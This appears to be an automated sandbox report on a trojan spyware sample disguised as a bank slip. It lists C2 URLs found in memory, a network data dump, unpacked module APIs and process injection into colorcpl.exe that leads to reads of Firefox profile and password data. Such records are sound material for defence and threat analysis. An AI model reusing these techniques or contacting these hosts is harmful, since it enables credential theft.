a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4160981089.000000000500A000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158584230.000000000612A000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4160981089.0000000004CE6000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158584230.0000000005E06000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://meanttobebroken.org/9g6s/?_XPD90E=l/X
                Source: PO1268931024 - Bank Slip.exe String found in binary or memory: http://tempuri.org/DatabaseWalletDataSet.xsd
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4162936515.0000000006C50000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.timizoasisey.shop
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4162936515.0000000006C50000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.timizoasisey.shop/3p0l/
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: colorcpl.exe, 00000007.00000002.4157400312.000000000359B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: colorcpl.exe, 00000007.00000003.2155261763.000000000845C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4160981089.00000000057E4000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158584230.0000000006904000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4160981089.0000000004E78000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158584230.0000000005F98000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.jexiz.shop/li8d/?qp=qTZ8t28&_XPD90E=sm
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4160981089.0000000004E78000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158584230.0000000005F98000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.jexiz.shop/li8d/?qp=qTZ8t28&amp;_XPD90E=sm
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052E02C07_2_052E02C0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0526AD007_2_0526AD00
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052FCD1F7_2_052FCD1F
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05278DBF7_2_05278DBF
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0525ADE07_2_0525ADE0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05260C007_2_05260C00
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05300CB57_2_05300CB5
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05250CF27_2_05250CF2
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05302F307_2_05302F30
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052A2F287_2_052A2F28
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05280F307_2_05280F30
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052D4F407_2_052D4F40
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052DEFA07_2_052DEFA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05252FC87_2_05252FC8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531EE267_2_0531EE26
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05260E597_2_05260E59
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531CE937_2_0531CE93
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05272E907_2_05272E90
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531EEDB7_2_0531EEDB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052769627_2_05276962
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052629A07_2_052629A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0532A9A67_2_0532A9A6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052628407_2_05262840
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0526A8407_2_0526A840
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052468B87_2_052468B8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0528E8F07_2_0528E8F0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531AB407_2_0531AB40
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05316BD77_2_05316BD7
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0525EA807_2_0525EA80
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053175717_2_05317571
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052FD5B07_2_052FD5B0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053295C37_2_053295C3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531F43F7_2_0531F43F
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052514607_2_05251460
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531F7B07_2_0531F7B0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052A56307_2_052A5630
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053116CC7_2_053116CC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0529516C7_2_0529516C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0524F1727_2_0524F172
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0532B16B7_2_0532B16B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0526B1B07_2_0526B1B0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531F0E07_2_0531F0E0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053170E97_2_053170E9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052670C07_2_052670C0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0530F0CC7_2_0530F0CC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531132D7_2_0531132D
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0524D34C7_2_0524D34C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052A739A7_2_052A739A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052652A07_2_052652A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0527D2F07_2_0527D2F0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_053012ED7_2_053012ED
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0527B2C07_2_0527B2C0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05317D737_2_05317D73
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05263D407_2_05263D40
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05311D5A7_2_05311D5A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0527FDC07_2_0527FDC0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052D9C327_2_052D9C32
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531FCF27_2_0531FCF2
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531FF097_2_0531FF09
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531FFB17_2_0531FFB1
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05261F927_2_05261F92
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05223FD27_2_05223FD2
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05223FD57_2_05223FD5
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05269EB07_2_05269EB0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052F59107_2_052F5910
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052699507_2_05269950
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0527B9507_2_0527B950
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052CD8007_2_052CD800
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052638E07_2_052638E0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531FB767_2_0531FB76
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0527FB807_2_0527FB80
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0529DBF97_2_0529DBF9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052D5BF07_2_052D5BF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052D3A6C7_2_052D3A6C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05317A467_2_05317A46
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0531FA497_2_0531FA49
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052FDAAC7_2_052FDAAC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_052A5AA07_2_052A5AA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_05301AA37_2_05301AA3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0530DAC67_2_0530DAC6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_03211B107_2_03211B10
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0320CA507_2_0320CA50
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0320AEC87_2_0320AEC8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0320CC707_2_0320CC70
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0320ACF07_2_0320ACF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_032133A07_2_032133A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_032151607_2_03215160
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0322B8607_2_0322B860
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0514E75C7_2_0514E75C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0514E3C67_2_0514E3C6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0514E2A47_2_0514E2A4
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0514D8287_2_0514D828
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 052DF290 appears 103 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 05295130 appears 58 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 052A7E54 appears 107 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 052CEA12 appears 86 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0524B970 appears 262 times
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: String function: 017E7E54 appears 107 times
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: String function: 017D5130 appears 58 times
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: String function: 0180EA12 appears 86 times
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: String function: 0178B970 appears 262 times
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: String function: 0181F290 appears 103 times
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1768400700.000000000105E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO1268931024 - Bank Slip.exe
                Source: PO1268931024 - Bank Slip.exe, 00000000.00000002.1784243858.000000000A020000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO1268931024 - Bank Slip.exe
                Source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974188510.00000000014A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs PO1268931024 - Bank Slip.exe
                Source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974347040.000000000188D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO1268931024 - Bank Slip.exe
                Source: PO1268931024 - Bank Slip.exeBinary or memory string: OriginalFilenamePbnE.exeF vs PO1268931024 - Bank Slip.exe
                Source: PO1268931024 - Bank Slip.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO1268931024 - Bank Slip.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.PO1268931024 - Bank Slip.exe.5930000.2.raw.unpack, at4ONG9F0NYCELN5Tj.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.PO1268931024 - Bank Slip.exe.414e790.1.raw.unpack, at4ONG9F0NYCELN5Tj.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, p4J06R29nMDv7rCX0R.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, p4J06R29nMDv7rCX0R.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, p4J06R29nMDv7rCX0R.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, qJpY5kwCJw8gj8Ev7k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, qJpY5kwCJw8gj8Ev7k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, p4J06R29nMDv7rCX0R.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, p4J06R29nMDv7rCX0R.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, p4J06R29nMDv7rCX0R.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/12
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO1268931024 - Bank Slip.exe.log
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\colorcpl.exe File created: C:\Users\user\AppData\Local\Temp\Ea64OHKq
                Source: PO1268931024 - Bank Slip.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: colorcpl.exe, 00000007.00000002.4157400312.00000000035FA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2156270139.00000000035FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PO1268931024 - Bank Slip.exeReversingLabs: Detection: 52%
                Source: unknownProcess created: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe "C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe"
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess created: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe "C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe"
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: windowscodecs.dll
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: colorui.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mscms.dll
